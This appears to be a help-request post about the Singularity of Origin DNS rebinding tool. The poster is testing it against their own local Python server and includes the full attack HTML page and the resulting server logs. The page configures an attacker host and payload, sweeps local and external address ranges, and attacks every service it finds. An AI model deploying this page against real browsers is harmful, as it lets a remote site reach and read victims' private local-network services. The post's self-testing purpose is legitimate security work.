Hi,
I tried to test my simple Python app, which listens on port 8080 on localhost.
I own a domain and a subdomain for this attack.
When I load the URL http://rebind.mydomain/autoattack.html, the DNS rebinding works, but the simple payload tries to fetch /soopayload.html from my simple Python service (GET /soopayload.html), which returns a 404...
I set up my config following this video :
https://www.youtube.com/watch?v=R5Y1luRhjbc
<!doctype html>
<html lang="en">
<head>
<title>Singularity of Origin DNS Rebinding Automatic Attack</title>
<script src="manager.js"></script>
<script src=scan-manager.js></script>
<meta charset="utf-8">
<meta http-equiv="x-dns-prefetch-control" content="off">
</head>
<body id="body" style="display: none">
The home page of vulnerable services will be dumped in the browser developer console.
<script>
// Manual settings for this test page; the object is handed to the manager
// through app.getConfiguration().setManually() below. Host values are the
// poster's redacted test setup.
const configuration = {
  attackHostIPAddress: 'X.X.X.X', // my Singularity web server
  attackHostDomain: 'dynamic.mydomain', // the name that has the NS entry
  rebindingStrategy: 'ma',
  attackPayload: 'Simple Fetch Get',
  interval: "1",
  flushDns: false,
  indexToken: "<!--thisismytesttoken-->",
  wsProxyPort: 3129,
  hideActivity: false,
  delayDOMLoad: false,
};

// Success hook: prints the reporting frame's origin and the response body it relayed.
configuration.rebindingSuccessFn = ({ origin, data }) => {
  console.log(`Iframe reports attack successful for ${origin}\n${data.response}`);
};

app.getConfiguration().setManually(configuration);

// Scan inputs read by the functions further down the script.
let addrSpec = `0.0.0.0`; // this is a Linux host
let searchForMoreAddresses = false;
// Defender's view: a service on this port that rejects requests carrying an
// unexpected Host header would refuse traffic sent to it under the rebinding
// domain. Presumably the plain Python test server does no such check; confirm.
const portSpec = '8080'; // Python simple server port
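/**
 * Per-target callback passed to sm.run(): logs the scan result, shows it in
 * the #activity element and hands the target to app.attackTarget().
 *
 * @param {object} result - Scan result; only result.target.address and
 *   result.target.port are read here, the rest is displayed as JSON.
 */
function scanFoundNewTargetCb(result) {
  console.log(result);

  // Append the serialized result as a text node instead of `innerHTML +=`:
  // any markup characters inside the result strings stay inert text, and the
  // existing content of #activity is not re-parsed on every new target.
  const activityLog = document.getElementById("activity");
  activityLog.append(
    document.createTextNode(JSON.stringify(result, null, 4)),
    document.createElement("br"),
  );

  // NOTE(review): replace() with a string pattern changes only the first "-".
  // Confirm whether every hyphen in the address is meant to be doubled.
  const { address, port } = result.target;
  app.attackTarget(address.replace("-", "--"), port, true);
}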
/**
 * Completion callback passed to sm.run(): marks the scan as done in the
 * #activity element and schedules two clean-up steps.
 *
 * @param {*} results - Supplied by the caller; not used here.
 */
function scanDoneCb(results) {
  const activityLog = document.getElementById("activity");
  activityLog.innerHTML += "Done.<br/>";

  // After 3 s, shut the scan manager down.
  setTimeout(() => sm.shutDown(), 3000);

  // After 90 s, point the hidden delaydomloadframe iframe at a blank page.
  setTimeout(() => {
    delaydomloadframe.src = "about:blank";
  }, 90000);
}
/**
 * Extends addrSpec with the external address and a /24-style range derived
 * from the local address, then starts the scan on portSpec.
 *
 * If the local address lookup rejects, the error is logged and the range
 * 192.168.1.1-254 is used instead. The returned promise settles once the
 * external address is known; it does not wait for the scan to start.
 */
async function getLocalIpAddressesThenScan() {
  // NOTE(review): sm is not declared in this listing; presumably a global
  // provided by scan-manager.js. Confirm.
  sm = ScanManager();

  const publicIp = await getMyExternalIpAddress();
  addrSpec = `${addrSpec},${publicIp}`;

  const scanWith = (extraRange) =>
    sm.run(`${addrSpec},${extraRange}`, portSpec, scanFoundNewTargetCb, scanDoneCb);

  const onLocalAddress = (localIp) => {
    // Keep the first three octets and sweep hosts 1-254 of that prefix.
    const prefix = localIp.split('.', 3).join('.');
    scanWith(`${prefix}.1-254`);
  };

  const onLookupFailure = (err) => {
    console.log(err);
    scanWith('192.168.1.1-254');
  };

  getLocalIpAddress().then(onLocalAddress, onLookupFailure);
}
// Entry point: scan only the addresses in addrSpec unless
// searchForMoreAddresses is switched on, in which case the external and
// local address ranges are added first.
if (searchForMoreAddresses !== true) {
  // NOTE(review): sm is not declared in this listing; presumably a global
  // provided by scan-manager.js. Confirm.
  sm = ScanManager();
  sm.run(`${addrSpec}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
} else {
  getLocalIpAddressesThenScan();
}
</script>
<h3>Scanning Progress</h3>
<div id="activity"></div>
<h3>DNS Rebinding Progress</h3>
<div id=attackframes></div>
<iframe id=delaydomloadframe src="/delaydomload" style="display: none"></iframe>
</body>
</html>
And this is the output of my Python server:
127.0.0.1 - - [18/Feb/2022 19:37:59] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:37:59] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:00] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:00] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:01] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:01] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:02] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:02] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:04] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:04] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:05] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:05] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:06] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:06] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -